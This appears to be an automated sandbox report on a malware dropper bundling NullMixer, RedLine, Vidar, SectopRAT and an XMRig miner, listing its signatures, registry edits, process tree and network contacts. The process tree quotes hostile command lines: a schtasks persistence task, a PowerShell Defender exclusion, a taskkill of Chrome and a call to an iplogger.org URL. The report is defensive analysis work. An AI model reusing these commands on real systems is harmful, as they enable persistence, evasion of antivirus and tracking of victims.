Analysis Overview
SHA256
befd232ab8dab62c010a0a96e0e62a1ff561509877fd8acfa1507df11e092aec
Threat Level: Known bad
The file 9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118 was found to be: Known bad.
Malicious Activity Summary
Privateloader family
Nullmixer family
SectopRAT
Socelars payload
PrivateLoader
Vidar
Redline family
Sectoprat family
NullMixer
SectopRAT payload
RedLine
Vidar family
Socelars
Socelars family
RedLine payload
xmrig
Xmrig family
Vidar Stealer
XMRig Miner payload
Command and Scripting Interpreter: PowerShell
Reads user/profile data of web browsers
ASPack v2.12-2.42
Loads dropped DLL
Checks computer location settings
Executes dropped EXE
Looks up external IP address via web service
Looks up geolocation information via web service
Checks installed software on the system
Accesses 2FA software files, possible credential harvesting
Adds Run key to start application
Drops Chrome extension
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Drops file in Windows directory
Drops file in Program Files directory
Program crash
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Unsigned PE
Browser Information Discovery
Checks processor information in registry
Kills process with taskkill
Suspicious use of FindShellTrayWindow
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
Scheduled Task/Job: Scheduled Task
Modifies system certificate store
Uses Task Scheduler COM API
Checks SCSI registry key(s)
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of SetWindowsHookEx
Suspicious use of SendNotifyMessage
Enumerates system info in registry
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-25 09:33
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-25 09:33
Reported
2024-11-25 09:36
Platform
win7-20240903-en
Max time kernel
60s
Max time network
145s
Command Line
Signatures
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Vidar
Vidar family
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Accesses 2FA software files, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\08240101651be7e1.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.db-ip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2644 set thread context of 1704 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\winnetdriv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\f34b9ab9db6d16.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\1710990cbc64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\453c5fa76a849.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\08240101651be7e010.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\1710990cbc64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\e4b2f18fb52218.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\e4b2f18fb52218.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\e4b2f18fb52218.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{75BD1881-AB10-11EF-9982-5A85C185DB3E} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\e4b2f18fb52218.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\e4b2f18fb52218.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\e4b2f18fb52218.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe"
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 08240101651be7e1.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 9aa6e16872.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 1710990cbc64.exe
C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\08240101651be7e1.exe
08240101651be7e1.exe
C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe
9aa6e16872.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 53516815d3135fe3.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c c862a054a35.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 4f5baa1083db067.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c f34b9ab9db6d16.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c e4b2f18fb52218.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 453c5fa76a849.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 08240101651be7e010.exe
C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\c862a054a35.exe
c862a054a35.exe
C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\453c5fa76a849.exe
453c5fa76a849.exe
C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\4f5baa1083db067.exe
4f5baa1083db067.exe
C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\1710990cbc64.exe
1710990cbc64.exe
C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\53516815d3135fe3.exe
53516815d3135fe3.exe
C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\e4b2f18fb52218.exe
e4b2f18fb52218.exe
C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\08240101651be7e010.exe
08240101651be7e010.exe
C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\f34b9ab9db6d16.exe
f34b9ab9db6d16.exe
C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\53516815d3135fe3.exe
"C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\53516815d3135fe3.exe"
C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\1710990cbc64.exe
"C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\1710990cbc64.exe" -a
C:\Users\Admin\AppData\Local\Temp\chrome2.exe
"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Windows\winnetdriv.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1732527218 0
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2248 -s 432
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Users\Admin\AppData\Roaming\services64.exe
"C:\Users\Admin\AppData\Roaming\services64.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\7zS843D.tmp\Install.cmd" "
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/16B4c7
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1996 CREDAT:275457 /prefetch:2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | watira.xyz | udp |
| US | 8.8.8.8:53 | www.listincode.com | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | db-ip.com | udp |
